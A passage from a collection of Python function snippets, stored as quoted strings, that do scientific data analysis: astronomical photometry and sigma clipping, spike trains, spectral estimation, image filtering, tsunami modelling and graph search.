of {1} rows'.format(\n numSections, numberOfRows))\n\n # Compute the sigma-clipping starting points and increments\n tmp = self._get_sigma_clip_start_and_steps(\n iters=iters,\n backgroundClipSigma=backgroundClipSigma,\n starClipSigma=starClipSigma\n )\n backgroundClipStart, backgroundClipStep, starClipStart, starClipStep = tmp\n\n # Initalize an empty array to hold the output\n outMean = np.zeros((ny, nx))\n outUncert = np.zeros((ny, nx))\n\n for sectionNumber in range(numSections):\n print('Starting section number {0}'.format(sectionNumber+ 1 ))\n # Compute the range of rows to extract\n startRow, endRow = self._get_start_and_end_rows(\n sectionNumber, numberOfRows\n )\n\n # Extract the data for this section\n dataSubStack = self._extract_data_sub_stack(startRow, endRow)\n\n # Extract the uncertainty for this section\n uncertSubStack = self._extract_uncert_sub_stack(startRow, endRow)\n\n # Extract the starSubMask for this section\n if issubclass(type(starMask), np.ndarray):\n starSubMask = starMask[startRow:endRow, :]\n elif issubclass(type(starMask), bool):\n starSubMask = starMask\n\n # Build the bad pixel mask for this subStack\n dataSubStack = self._construct_sub_stack_bad_pixel_mask(\n dataSubStack,\n starSubMask,\n iters=iters,\n backgroundClipStart=backgroundClipStart,\n backgroundClipStep=backgroundClipStep,\n starClipStart=starClipStart,\n starClipStep=starClipStep\n )\n\n # Compute the mean and uncertainty of the masked array\n mean, uncert = self._compute_masked_mean_and_uncertainty(\n dataSubStack, uncertSubStack)\n\n # Store the result in the output\n outMean[startRow:endRow, :] = mean\n outUncert[startRow:endRow, :] = uncert\n\n return outMean, outUncert", "def autoExtract(array):#Extract signal from a 1D-array\n \n derivmax = medianFilter(derivation(array)).argmax()\n derivmin = medianFilter(derivation(array)).argmin()\n i = 0\n extraction = []\n while i < len(array) or i <= 300:\n if i >= derivmax and i <= derivmin:\n extraction.append(array[i])\n i = i+1\n extraction = np.array(extraction)\n derivmax = derivmax\n derivmin = derivmin\n return extraction", "def array_to_spiketrains(array, bin_size):\n stList = []\n for trial in range(len(array)):\n trialList = []\n for channel in range(array.shape[2]):\n times = np.nonzero(array[trial, :, channel])[0]\n counts = array[trial, times, channel].astype(int)\n times = np.repeat(times, counts)\n st = neo.SpikeTrain(times*bin_size*pq.ms, t_stop=array.shape[1]*bin_size*pq.ms)\n trialList.append(st)\n stList.append(trialList)\n return stList", "def _random_jitter(self, sampling_results, img_metas, amplitude=0.15):\n for sampling_result, img_meta in zip(sampling_results, img_metas):\n bboxes = sampling_result.pos_bboxes\n random_offsets = bboxes.new_empty(bboxes.shape[0], 4).uniform_(\n -amplitude, amplitude)\n # before jittering\n cxcy = (bboxes[:, 2:4] + bboxes[:, :2]) / 2\n wh = (bboxes[:, 2:4] - bboxes[:, :2]).abs()\n # after jittering\n new_cxcy = cxcy + wh * random_offsets[:, :2]\n new_wh = wh * (1 + random_offsets[:, 2:])\n # xywh to xyxy\n new_x1y1 = (new_cxcy - new_wh / 2)\n new_x2y2 = (new_cxcy + new_wh / 2)\n new_bboxes = torch.cat([new_x1y1, new_x2y2], dim=1)\n # clip bboxes\n max_shape = img_meta['img_shape']\n if max_shape is not None:\n new_bboxes[:, 0::2].clamp_(min=0, max=max_shape[1] - 1)\n new_bboxes[:, 1::2].clamp_(min=0, max=max_shape[0] - 1)\n\n sampling_result.pos_bboxes = new_bboxes\n return sampling_results", "def FAP_dist(peak_amps, Nbins=1000):\n zmin = np.linspace(0, peak_amps.max(), Nbins)\n FAP = np.zeros(Nbins)\n for i in range(Nbins):\n FAP[i] = (peak_amps > zmin[i]).sum()\n FAP /= peak_amps.shape[0] # Normalize\n return zmin, FAP", "def get_mean_in_time(trajectories, nb_bins=15, freq_range=[0.4, 0.6]):\n # Create bins and select trajectories going through the freq_range\n time_bins = np.linspace(-950, 2000, nb_bins)\n trajectories = [traj for traj in trajectories if np.sum(np.logical_and(\n traj.frequencies >= freq_range[0], traj.frequencies < freq_range[1]), dtype=bool)]\n\n # Offset trajectories to set t=0 at the point they are seen in the freq_range and adds all the frequencies / times\n # to arrays for later computation of mean\n t_traj = np.array([])\n f_traj = np.array([])\n for traj in trajectories:\n idx = np.where(np.logical_and(traj.frequencies >=\n freq_range[0], traj.frequencies < freq_range[1]))[0][0]\n traj.t = traj.t - traj.t[idx]\n t_traj = np.concatenate((t_traj, traj.t))\n f_traj = np.concatenate((f_traj, traj.frequencies))\n\n # Binning of all the data in the time bins\n filtered_fixed = [traj for traj in trajectories if traj.fixation == \"fixed\"]\n filtered_lost = [traj for traj in trajectories if traj.fixation == \"lost\"]\n freqs, fixed, lost = [], [], []\n for ii in range(len(time_bins) - 1):\n freqs = freqs + [f_traj[np.logical_and(t_traj >= time_bins[ii], t_traj < time_bins[ii + 1])]]\n fixed = fixed + [len([traj for traj in filtered_fixed if traj.t[-1] < time_bins[ii]])]\n lost = lost + [len([traj for traj in filtered_lost if traj.t[-1] < time_bins[ii]])]\n\n # Computation of the mean in each bin, active trajectories contribute their current frequency,\n # fixed contribute1 and lost contribute 0\n mean = []\n for ii in range(len(freqs)):\n mean = mean + [np.sum(freqs[ii]) + fixed[ii]]\n mean[-1] /= (len(freqs[ii]) + fixed[ii] + lost[ii])\n\n nb_active = [len(freq) for freq in freqs]\n nb_dead = [fixed[ii] + lost[ii] for ii in range(len(fixed))]\n\n return 0.5 * (time_bins[1:] + time_bins[:-1]), mean, nb_active, nb_dead", "def get_peaks(self, spectrum, amplitude):\n peaks = []\n average_noise_level = self._get_average_noise_level(amplitude)\n\n for i, a in enumerate(amplitude):\n noise = next(average_noise_level)\n\n if a / noise > self.threshold and self._is_max(amplitude[i-1], a, amplitude[i+1]):\n peaks.append(tuple([spectrum[i], a, noise]))\n\n peaks.sort(reverse=True, key=lambda x: x[1] / x[2])\n \n if len(peaks) > self.peaks_arr_size:\n del peaks[self.sample_arr_size:]\n\n return peaks", "def testStatisticsRamp(self):\n\n \n nx = 101\n ny = 64\n img = afwImage.ImageF(afwGeom.Extent2I(nx, ny))\n \n z0 = 10.0\n dzdx = 1.0\n mean = z0 + (nx/2)*dzdx\n stdev = 0.0\n for y in range(ny):\n for x in range(nx):\n z = z0 + dzdx*x\n img.set(x, y, z)\n stdev += (z - mean)*(z - mean)\n\n stdev = math.sqrt(stdev/(nx*ny - 1))\n \n stats = afwMath.makeStatistics(img, afwMath.NPOINT | afwMath.STDEV | afwMath.MEAN)\n testmean = stats.getValue(afwMath.MEAN)\n teststdev = stats.getValue(afwMath.STDEV)\n \n self.assertEqual(stats.getValue(afwMath.NPOINT), nx*ny)\n self.assertEqual(testmean, mean)\n self.assertEqual(teststdev, stdev )\n \n stats = afwMath.makeStatistics(img, afwMath.STDEV | afwMath.MEAN | afwMath.ERRORS)\n mean, meanErr = stats.getResult(afwMath.MEAN)\n sd = stats.getValue(afwMath.STDEV)\n \n self.assertEqual(mean, img.get(nx/2, ny/2))\n self.assertEqual(meanErr, sd/math.sqrt(img.getWidth()*img.getHeight()))\n \n # ===============================================================================\n # sjb code for percentiles and clipped stats\n \n stats = afwMath.makeStatistics(img, afwMath.MEDIAN)\n self.assertEqual(z0 + dzdx*(nx - 1)/2.0, stats.getValue(afwMath.MEDIAN))\n \n stats = afwMath.makeStatistics(img, afwMath.IQRANGE)\n self.assertEqual(dzdx*(nx - 1)/2.0, stats.getValue(afwMath.IQRANGE))\n \n stats = afwMath.makeStatistics(img, afwMath.MEANCLIP)\n self.assertEqual(z0 + dzdx*(nx - 1)/2.0, stats.getValue(afwMath.MEANCLIP))", "def skystats(stamp):\n\t\n\tif isinstance(stamp, galsim.Image):\n\t\ta = stamp.array\n\t\t# Normally there should be a .transpose() here, to get the orientation right.\n\t\t# But in the present case it doesn't change anything, and we can skip it.\n\telse:\n\t\ta = stamp # Then we assume that it's simply a numpy array.\n\t\n\tedgepixels = np.concatenate([\n\t\t\ta[0,1:], # left\n\t\t\ta[-1,1:], # right\n\t\t\ta[:,0], # bottom\n\t\t\ta[1:-1,-1] # top\n\t\t\t])\n\tassert len(edgepixels) == 2*(a.shape[0]-1) + 2*(a.shape[0]-1)\n\n\t# And we convert the mad into an estimate of the Gaussian std:\n\treturn {\n\t\t\"std\":np.std(edgepixels), \"mad\": 1.4826 * mad(edgepixels),\n\t\t\"mean\":np.mean(edgepixels), \"med\":np.median(edgepixels),\n\t\t\"stampsum\":np.sum(a)\n\t\t}", "def filter_gaps(msa_obj, gap_cutoff=0.5):\n # msa must be a list\n import numpy as np\n alphabet = \"ARNDCQEGHILKMFPSTWYV-\"\n states = len(alphabet)\n tmp = (msa_obj == states - 1).astype(np.float)\n non_gaps = np.where(np.sum(tmp.T, -1).T / msa_obj.shape[0] < gap_cutoff)[0]\n return msa_obj[:, non_gaps], non_gaps", "def process_tir_image(ds, data_res, t_thresh=-50, min_mcs_size=5000):\n ctt = (ds['tb']).squeeze()-273.15\n min_pix_nb = min_mcs_size / data_res**2\n\n max_pix_nb = 300000 / data_res**2 # this is to capture satellite artefacts that come in large contiguous stripes.\n labels, goodinds = mcs_define(ctt.values, t_thresh, minmax_area=[min_pix_nb, max_pix_nb]) # 7.7x7.7km = 64km2 per pix in gridsat? 83 pix is 5000km2\n dic = dictionary()\n #plt.figure()\n #plt.pcolormesh(labels)\n #plt.colorbar()\n #plt.show()\n for g in goodinds:\n\n if g==0:\n continue\n\n pos = np.where(labels==g)\n npos = np.where(labels!=g)\n datestr = str(int(ctt['time.year'].values))+'-'+str(int(ctt['time.month'].values)).zfill(2)+'-'+str(int(ctt['time.day'].values)).zfill(2)+'_'+\\\n str(int(ctt['time.hour'].values)).zfill(2)+':'+str(int(ctt['time.minute'].values)).zfill(2)\n \n dic['date'].append(datestr)\n dic['month'].append(int(ctt['time.month']))\n dic['hour'].append(int(ctt['time.hour']))\n dic['year'].append(int(ctt['time.year']))\n dic['day'].append(int(ctt['time.day']))\n dic['minute'].append(int(ctt['time.minute']))\n\n storm = ctt.copy()\n storm.values[npos] = np.nan\n tmin_pos = np.nanargmin(storm.values)\n tpos_2d = np.unravel_index(tmin_pos, storm.shape)\n \n latmin = np.nanmin(ctt.lat.values[pos[0]])\n latmax = np.nanmax(ctt.lat.values[pos[0]])\n lonmin = np.nanmin(ctt.lon.values[pos[1]])\n lonmax = np.nanmax(ctt.lon.values[pos[1]])\n dic['area'].append(np.sum(np.isfinite(storm.values))*data_res**2)\n dic['70area'].append(np.sum(storm.values<=-70)*data_res**2)\n dic['minlon'].append(lonmin)\n dic['minlat'].append(latmin)\n dic['maxlon'].append(lonmax)\n dic['maxlat'].append(latmax)\n dic['clon'].append(lonmin + (lonmax - lonmin)/2)\n dic['clat'].append(latmin + (latmax - latmin)/2)\n dic['tmin'].append(np.nanmin(storm))\n dic['tminlat'].append(float(ctt.lat[tpos_2d[0]].values))\n dic['tminlon'].append(float(ctt.lon[tpos_2d[1]].values))\n dic['tmean'].append(float(np.nanmean(storm)))\n dic['tp1'].append(float(np.nanpercentile(storm, 1)))\n dic['tp99'].append(float(np.nanpercentile(storm, 99)))\n dic['stormID'].append(datestr + '_' + str(g))\n dic['cloudMask'].append(labels==g)\n dic['tir'].append(storm.values)\n\n # for k in dic.keys():\n # print(k, len(dic[k]))\n return dic", "def spectrum_multi_taper(self):\r\n if np.iscomplexobj(self.input.data):\r\n psd_len = self.input.shape[-1] \r\n dt = complex\r\n else:\r\n psd_len = self.input.shape[-1] / 2 + 1\r\n dt = float\r\n\r\n #Initialize the output\r\n spectrum_multi_taper = np.empty((self.input.shape[:-1] + (psd_len,)),\r\n dtype=dt)\r\n\r\n #If multi-channel data:\r\n if len(self.input.data.shape) > 1:\r\n for i in range(self.input.data.shape[0]):\r\n # 'f' are the center frequencies of the frequency bands\r\n # represented in the MT psd. These are identical in each\r\n # iteration of the loop, so they get reassigned into the same\r\n # variable in each iteration:\r\n f, spectrum_multi_taper[i], _ = tsa.multi_taper_psd(\r\n self.input.data[i],\r\n Fs=self.input.sampling_rate,\r\n BW=self.BW,\r\n adaptive=self.adaptive,\r\n low_bias=self.low_bias)\r\n else:\r\n f, spectrum_multi_taper, _ = tsa.multi_taper_psd(self.input.data,\r\n Fs=self.input.sampling_rate,\r\n BW=self.BW,\r\n adaptive=self.adaptive,\r\n low_bias=self.low_bias)\r\n\r\n return f, spectrum_multi_taper", "def n_finder(gt_mat, x, eps):\n numsnps = int(0.9*gt_mat.shape[0])\n assert(x < numsnps)\n assert(eps > 0 and eps<= 1.0)\n indices = np.random.choice(numsnps, size=x, replace=False)\n n = 0\n avg_array = np.zeros(gt_mat.shape[0])\n going = True\n while going:\n r2_list = [np.corrcoef(gt_mat[i,:],gt_mat[i+n,:])[0,1]**2 for i in indices]\n avg_array[n] = np.nanmean(r2_list)\n n += 1\n if np.mean(r2_list) < eps:\n going = False \n return n,avg_array[:n]", "def estimate_peaks(samples, thresh=0.02):\n pks = find_peaks(samples, prominence=thresh)\n npks = np.ones(len(samples), dtype=bool)\n npks[pks[0]] = False\n return np.mean(samples[pks[0]])/np.mean(samples[npks]), len(pks[0])", "def aperphot(fn, timekey=None, pos=[0,0], dap=[2,4,6], mask=None, verbose=False, nanval=999, resamp=None, retfull=False):\n # 2009-09-14 10:49 IJC: Created\n # 2010-01-15 14:20 IJC: Added numpy \"_string\" check\n # 2011-12-29 12:01 IJMC: Added peak pixel values to photometry report.\n # 2012-01-25 11:26 IJMC: Adding \"resamp\" option -- thanks to\n # K. Stevenson and J. Harrington of UCF for\n # the suggestion.\n # 2012-02-26 11:53 IJMC: Now return 'ntarg' and 'nsky' -- number of pixels used.\n # 2012-06-07 08:27 IJMC: 'peak' values are now corrected for the\n # resampling factor.\n # 2012-07-03 10:35 IJMC: Fixed a key bug: frames were not\n # correctly background-subtracted when\n # applying partial-pixel resampling.\n # 2012-10-19 13:41 IJMC: Documented 'retfull' option; changed default.\n # 2013-03-20 09:21 IJMC: More error-checking for saving header\n # keywords. Thanks to A. Weigel @\n # ETH-Zurich for catching this!\n\n from numpy import meshgrid, median,isfinite,sort,ndarray,string_\n import numpy as np\n import pyfits\n #from analysis import fixval\n from os import path\n from scipy import interpolate\n\n thisobs = phot()\n x0, y0 = pos\n dap_targ, dap_skyinner, dap_skyouter = dap\n if resamp is None or resamp<1:\n resamp = 1\n else:\n resamp = float(resamp)\n \n # Determine size:\n if isinstance(fn,str):\n nx = pyfits.getval(fn, 'NAXIS1')\n ny = pyfits.getval(fn, 'NAXIS2')\n elif isinstance(fn,ndarray):\n nx,ny = fn.shape\n\n nx0, ny0 = nx, ny\n nx = ((nx - 1)*resamp + 1.) # Avoid resampling at pixel locations\n ny = ((ny - 1)*resamp + 1.) # outside the original boundaries.\n\n # Generate or load masks:\n if mask==None:\n xx,yy = meshgrid(np.arange(ny)/resamp, np.arange(nx)/resamp)\n mask_targ = makemask(xx, yy, (x0, y0, dap_targ))\n mask_s1 = makemask(xx, yy, (x0,y0, dap_skyinner))\n mask_s2 = makemask(xx, yy, (x0,y0, dap_skyouter))\n mask_sky = mask_s2 - mask_s1\n else:\n mask_targ = mask==1\n mask_sky = mask==2\n if resamp>1:\n print \"In aperphot, resamp>1 and user-specified mask passed in... beware!\"\n\n # Load data frame:\n thisobs = phot()\n if isinstance(fn,ndarray):\n frame = fn\n elif isinstance(fn, str) or isinstance(fn,string_):\n if not path.isfile(fn):\n print \"file %s not found! exiting...\" % fn\n return thisobs\n frame = pyfits.getdata(fn)\n fixval(frame, nanval)\n\n # Resample data frame\n if resamp>1:\n frame0 = frame.copy()\n xx0 = range(nx0)\n yy0 = range(ny0)\n x1,y1 = np.arange(nx)/resamp, np.arange(ny)/resamp\n rectspline = interpolate.fitpack2.RectBivariateSpline(xx0, yy0, frame0, kx=1, ky=1, s=0)\n frame = rectspline(x1, y1)\n\n #from pylab import *\n #pdb.set_trace()\n # Measure background and aperture photometry\n thisbg, thisebg = estbg(frame, mask=mask_sky, plotalot=verbose, rout=[3,99])\n thisphot = (mask_targ*(frame - thisbg)).sum() /resamp/resamp\n peak = frame.max()\n peak_targ = (mask_targ * frame).max()\n peak_annulus = (mask_sky * frame).max()\n\n thisobs.bg=thisbg\n thisobs.ebg=thisebg\n thisobs.bgstr='phot.estbg: SDOM on bg histogram mean & dispersion after outlier rejection'\n thisobs.phot=thisphot\n thisobs.photstr='by-hand background-subtracted aperture photometry'\n thisobs.ntarg = mask_targ.sum()/resamp/resamp\n thisobs.nsky = mask_sky.sum()/resamp/resamp\n\n thisobs.peak = peak\n thisobs.peak_targ = peak_targ\n thisobs.peak_annulus = peak_annulus\n thisobs.peakstr = 'peak pixel value in frame'\n thisobs.peak_targstr = 'peak pixel value in target aperture'\n thisobs.peak_annulusstr = 'peak pixel value in sky annulus'\n thisobs.position = pos\n thisobs.positionstr = 'user-specified, zero-indexed pixel coordinates.'\n if isinstance(fn, str):\n header = pyfits.getheader(fn)\n if not timekey==None:\n if timekey in header: \n thisobs.time=header['timekey']\n thisobs.timestr='heliocentric modified julian date'\n if 'object' in header: thisobs.object = header['object']\n if 'exptime' in header: thisobs.exptime = header['exptime']\n thisobs.aper = dap\n thisobs.aperstr = 'target, inner, outer aperture diameters, in pixels.'\n thisobs.filename=fn\n thisobs.resamp = resamp\n if retfull:\n thisobs.mask_targ = mask_targ\n thisobs.mask_sky = mask_sky\n thisobs.frame = frame\n\n if verbose:\n from pylab import figure, colorbar\n from nsdata import imshow\n figure(); imshow(frame*mask_targ); colorbar()\n figure(); imshow(frame*mask_sky); colorbar()\n\n return thisobs", "def calc_tsunami(slip_result):\n gf = h5py.File('NA_CAS.hdf5', 'r')\n time_array = np.array(gf['time/timedata'])\n\n # dictionary for holding slip calculations\n scale_gf = []\n\n # declare empty array with max size\n ar_len = len(time_array)\n ar_width = get_array_size()\n\n tgf = np.zeros(shape=(ar_len, ar_width)) # tgf = tsunami green's function\n\n # loop over index adn slip value from slip array\n for i, slip in enumerate(slip_result):\n # print(i)\n # make sure slip is a float not string\n s = float(slip)\n\n # multiply slip by each subfault\n scale_gf.append(s * gf['GF/{:03}'.format(i)][:])\n\n # iterate over all the subfaults and add all subfaults together per site\n for sf in scale_gf:\n tgf += sf\n\n # return the slip_at_site array and the time array\n return (tgf, time_array)", "def combined_gaussian(amps, fwhms, means, x):\n if len(amps) > 0.:\n for i in range(len(amps)):\n gauss = gaussian(amps[i], fwhms[i], means[i], x)\n if i == 0:\n combined_gauss = gauss\n else:\n combined_gauss += gauss\n else:\n combined_gauss = np.zeros(len(x))\n return combined_gauss", "def sim_hits(tmat,start_list,targ_list,ntraj = 1000, cutoff=1000):\n \n # get state names\n nstates = tmat.shape[0]\n states = array([ii for ii in range(nstates)])\n \n trajs = list()\n \n for ii in range(ntraj):\n curr = choice(start_list)\n traj = list()\n traj.append(curr)\n while curr not in targ_list:\n weights = copy(tmat[curr, :])\n curr = discrete_dist(states, weights, nn=1)\n traj.append(curr)\n \n if len(traj)>=cutoff:\n # traj=[nan]\n break\n \n trajs.append(array(traj))\n\n return trajs", "def amp_by_time(sig, fs, f_range, hilbert_increase_n=False, remove_edges=True, **filter_kwargs):\n\n sig_filt, kernel = filter_signal(sig, fs, infer_passtype(f_range), f_range=f_range,\n remove_edges=False, return_filter=True, **filter_kwargs)\n\n amp = np.abs(robust_hilbert(sig_filt, increase_n=hilbert_increase_n))\n\n if remove_edges:\n amp = remove_filter_edges(amp, len(kernel))\n\n return amp", "def extract_distribution(ptree):\n w_apx = np.zeros(ptree.shape)\n FlattenPtreeRecur(ptree, w_apx, 1, 1)\n return w_apx", "def processImage(imgs):\r\n imgs = imgs.astype(np.float32)\r\n for i, img in enumerate(imgs):\r\n m = img.mean()\r\n s = img.std()\r\n imgs[i] = (img - m) / s\r\n return imgs", "def learnGauss(metricArray): \n fit = gaussReg() \n n= 100 #You should probably change this...\n overlap = 0.3 \n imageSize = [100,400]\n densMap(fit, metricArray, n, overlap, imageSize )\n overlayMap('SmallTile.jpg', 'ContourPlot.jpg') \n # Final map is saved as OverlayMap.jpg", "def calculate_meanpT_fluc(dN_array, pT_array, pT_min=0.0, pT_max=3.0):\n npT_interp = 50\n pT_inte_array = linspace(pT_min, pT_max, npT_interp)\n\n nev, npT = dN_array.shape\n mean_pT_array = zeros(nev)\n for iev in range(nev):\n dN_interp = exp(interp(pT_inte_array, pT_array[iev, :],\n log(dN_array[iev, :] + 1e-30)))\n mean_pT_array[iev] = (sum(pT_inte_array**2.*dN_interp)\n /sum(pT_inte_array*dN_interp))\n\n # compute the error using jack-knife\n rn_array = zeros(nev)\n for iev in range(nev):\n array_idx = [True]*nev\n array_idx[iev] = False\n array_idx = array(array_idx)\n rn_ev = (std(mean_pT_array[array_idx])\n /(mean(mean_pT_array[array_idx]) + 1e-15))\n rn_array[iev] = rn_ev\n rn_mean = mean(rn_array, axis=0)\n rn_err = sqrt((nev - 1.)/nev*sum((rn_array - rn_mean)**2.))\n return([rn_mean, rn_err])", "def _find_peaks_heuristic(phnorm):\n median_scale = np.median(phnorm)\n\n # First make histogram with bins = 0.2% of median PH\n hist, bins = np.histogram(phnorm, 1000, [0, 2*median_scale])\n binctr = bins[1:] - 0.5 * (bins[1] - bins[0])\n\n # Scipy continuous wavelet transform\n pk1 = np.array(sp.signal.find_peaks_cwt(hist, np.array([2, 4, 8, 12])))\n\n # A peak must contain 0.5% of the data or 500 events, whichever is more,\n # but the requirement is not more than 5% of data (for meager data sets)\n Ntotal = len(phnorm)\n MinCountsInPeak = min(max(500, Ntotal//200), Ntotal//20)\n pk2 = pk1[hist[pk1] > MinCountsInPeak]\n\n # Now take peaks from highest to lowest, provided they are at least 40 bins from any neighbor\n ordering = hist[pk2].argsort()\n pk2 = pk2[ordering]\n peaks = [pk2[0]]\n\n for pk in pk2[1:]:\n if (np.abs(peaks-pk) > 10).all():\n peaks.append(pk)\n peaks.sort()\n return np.array(binctr[peaks])", "def get_mean_image_population(caps_directory, tsv, template_image):\n import pandas as pd\n import os\n import nibabel as nib\n import numpy as np\n\n if not os.path.exists(os.path.join(caps_directory, 'group')):\n os.makedirs(os.path.join(caps_directory, 'group'))\n\n df = pd.read_csv(tsv, sep='\\t')\n if ('session_id' != list(df.columns.values)[1]) and (\n 'participant_id' != list(df.columns.values)[0]):\n raise Exception('the data file is not in the correct format.')\n participant_id = list(df['participant_id'])\n session_id = list(df['session_id'])\n\n # get the template image info:\n template_image_data = nib.load(template_image)\n template_image_array = template_image_data.get_data()\n header = template_image_data.header\n affine = template_image_data.affine\n\n final_array = np.empty((template_image_array.shape[0], template_image_array.shape[1], template_image_array.shape[2], len(participant_id)))\n\n for i in range(len(participant_id)):\n image = os.path.join(caps_directory, 'subjects', participant_id[i], session_id[i], 't1', 'preprocessing_dl', participant_id[i] + '_' + session_id[i] + '_space-MNI_res-1x1x1.nii.gz')\n image_data = nib.load(image)\n image_array = image_data.get_data()\n final_array[..., i] = image_array\n\n # take the mean of image\n final_mean_array = np.mean(final_array, axis=3)\n\n # save the mean image as nifti\n mean_image = nib.Nifti1Image(final_mean_array, affine, header)\n nib.save(mean_image, os.path.join(caps_directory, 'group', 'mean_population.nii.gz'))", "def make_photon_arrays(path, numevents):\n xcoords = []\n zcoords = []\n \n nsipmarrays = []\n nabsarrays = []\n \n for filename in os.listdir(path):\n\n photondata = np.loadtxt(path+'/'+filename,delimiter=',',usecols=[1,4])\n\n coords = filename[0:8]\n\n arraylen = len(photondata.flatten('F'))\n \n nsipmphotons = photondata.flatten('F')[numevents:arraylen]\n #print(len(nsipmphotons))\n nabsphotons = photondata.flatten('F')[0:numevents] \n \n nsipmarrays.append(nsipmphotons)\n nabsarrays.append(nabsphotons)\n \n x = re.findall('(-[0-9]+)x',coords) \n \n if bool(x) == False:\n x = re.findall('([0-9]+)x', coords)\n \n z = re.findall('(-[0-9]+)z',coords) \n\n if bool(z) == False:\n z = re.findall('([0-9]+)z',coords)\n\n xcoords.append(x[0])\n zcoords.append(z[0])\n \n xcoords = np.array(xcoords).astype(np.float)\n zcoords = np.array(zcoords).astype(np.float)\n \n return xcoords, zcoords, nsipmarrays, nabsarrays", "def Read_AGSS(fln, oversample=None, sigma=None, tophat=None, thin=None, wave_cut=None, convert=None, linlog=False):\n ## Opening the file table\n hdu = pyfits.open(fln)\n\n ## Extracting the wavelength from the header\n hdr = hdu[0].header\n wav = hdr['CRVAL1'] + np.arange(hdr['NAXIS1'], dtype=float) * hdr['CDELT1']\n\n ## Extracting the data. grid.shape = n_mu, n_wavelength\n grid = hdu[0].data\n\n ## Trim the unwanted wavelength range\n if wave_cut is not None:\n inds = (wav >= wave_cut[0]) * (wav <= wave_cut[1])\n grid = grid[:,inds]\n wav = wav[inds]\n\n ## Oversample the spectrum if requested\n if oversample is not None and oversample != 1:\n #grid = scipy.ndimage.zoom(grid, oversample, order=1, mode='reflect')\n #wav = np.linspace(wav[0], wav[-1], wav.size*oversample)\n interp = scipy.interpolate.UnivariateSpline(wav, grid, k=1, s=0)\n wav = np.linspace(wav[0], wav[-1], wav.size*oversample+1)\n grid = interp(wav)\n\n ## Smooth the spectrum if requested\n logger.log(6, \"Original: sigma {}, tophat {}\".format(sigma,tophat))\n if sigma is not None or tophat is not None:\n bin = wav[1]-wav[0]\n ## We have to convert values to bin units\n if sigma is None:\n sigma = 0.\n else:\n sigma = sigma/bin\n if tophat is None:\n tophat = 1\n else:\n tophat = int(tophat/bin + 0.5)\n tophat = 1 if tophat < 1 else tophat\n logger.log(6, \"Bin converted: bin {}, sigma {}, tophat {}\".format(bin,sigma,tophat))\n grid = Utils.Series.Convolve_gaussian_tophat(grid, sigma=sigma, top=tophat)\n\n ## Thin the spectrum if requested\n if thin is not None:\n grid = grid[::thin]\n wav = wav[::thin]\n\n ## Convert to logarithmic (velocity) scale so that Doppler boosting is linear\n if linlog:\n new_wav, z = Utils.Series.Resample_linlog(wav)\n ws, inds = Utils.Series.Getaxispos_vector(wav, new_wav)\n wav = new_wav\n grid = grid.take(inds, axis=-1)*(1-ws) + grid.take(inds+1, axis=-1)*ws\n else:\n z = None\n if convert is not None:\n print( \"Saving the data into \"+fln+convert )\n np.savetxt(fln+convert,np.vstack((wav,np.log10(grid))).T)\n return grid, wav, z", "def locate_traps(graph):\n traps = []\n for node in graph:\n if len(graph[node]) < 2:\n traps.append(node)\n continue\n else:\n neighbours = graph[node]\n\n # copy graph and delete the node\n temp_graph = copy.deepcopy(graph)\n for neighbour in neighbours:\n temp_graph[neighbour].remove(node)\n temp_graph.pop(node)\n\n # heuristic: if you can BFS from a node's neighbour to all other neighbours in < 10 steps (after removing that node), then graph is still connected => not a trappable node\n BFS_q = deque()\n visited = [[False] * 12 for _ in range(10)]\n visited[neighbours[0][1]][neighbours[0][0]] = True\n BFS_q.append(neighbours[0])\n counter = 0\n while len(BFS_q) > 0 and counter < 10:\n u = BFS_q.popleft()\n for BFS_neighbour in temp_graph[u]:\n if not visited[BFS_neighbour[1]][BFS_neighbour[0]]:\n visited[BFS_neighbour[1]][BFS_neighbour[0]] = True\n BFS_q.append(BFS_neighbour)\n counter += 1\n for neighbour in neighbours:\n if visited[neighbour[1]][neighbour[0]] is False:\n traps.append(node)\n continue\n return (traps)", "def gaussianPyr(img: np.ndarray, levels: int = 4) -> List[np.ndarray]:\r\n img = cropPic(img, levels)\r\n pyrLst = [img]\r\n gaussian = gaussianKer(5)\r\n\r\n for i in range(1, levels):\r\n I_temp = cv2.filter2D(pyrLst[i - 1], -1, gaussian, cv2.BORDER_REPLICATE)\r\n I_temp = I_temp[::2, ::2]\r\n pyrLst.append(I_temp)\r\n return pyrLst", "def adaptiveGaussianThreshold(img):\n\tgray = grayscale(img)\n\tgray = cv2.medianBlur(gray, 5)\n\tthresh = cv2.adaptiveThreshold(gray, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 11, 2)\n\treturn thresh", "def fmgf(array, sigma):\n x, y = np.arange(len(array)), array.copy()\n yg = ndimage.filters.gaussian_filter(y, sigma)\n y -= yg\n\n # digitizing\n m = 101\n dy = 6.0 * mad(y) / m\n ybin = np.arange(np.min(y) - 5 * dy, np.max(y) + 5 * dy + dy, dy)\n z = np.zeros([len(ybin), len(x)])\n z[np.digitize(y, ybin), x] = 1.0\n\n # filtering\n g = partial(ndimage.filters.gaussian_filter, sigma=(0, sigma))\n c = partial(ndimage.filters.convolve1d, weights=np.ones(m), axis=0)\n zf = c(c(c(g(z))))\n\n # estimates\n ym1, y0, yp1 = [ybin[np.argmax(zf, 0) + i] for i in (-1, 0, 1)]\n zm1, z0, zp1 = [zf[np.argmax(zf, 0) + i, x] for i in (-1, 0, 1)]\n t = (zm1 - z0) / (zm1 - 2 * z0 + zp1)\n\n filtered = yg + ((1 - t) ** 2) * ym1 + (2 * t * (1 - t)) * y0 + (t**2) * yp1\n return filtered", "def calc_flux_array(self):\n \n # First determine the associated spectrum\n self.compute_template_spectrum()\n\n # Calculate baseline counts to normalise fluxes we scan over\n # Go from 10**(bin_min)*mean up to 10**(bin_max)*mean in nbins steps\n b = self.setup_b_instance(0,add_ps_mask=True)\n mean = np.sum(b.CTB_masked_compressed[0])/len(b.CTB_masked_compressed[0])\n A_array = mean*10**np.linspace(self.bin_min,self.bin_max,self.nbins)\n\n # Array to get LLs when no profile likelihood run\n norun = np.array([1.0, 1.0, 1.0, 1.0])\n\n # Now setup and compute the arrays\n LL_array = np.array([]) \n A_array_short = np.array([])\n spect_array = np.array([])\n\n for i in range(len(A_array)):\n print \"on i =\",i\n # Calculate LL\n if i == 0:\n b1 = self.setup_b_instance(A_array[i],add_ps_mask=True)\n else:\n for key in b1.fixed_template_dict_nested.keys():\n b1.fixed_template_dict_nested[key] = b1.fixed_template_dict_nested[key]*A_array[i]/A_array[i-1]\n ll_val = b1.ll(norun,4,4)\n # Make triangle\n\n # Append to arrays\n LL_array = 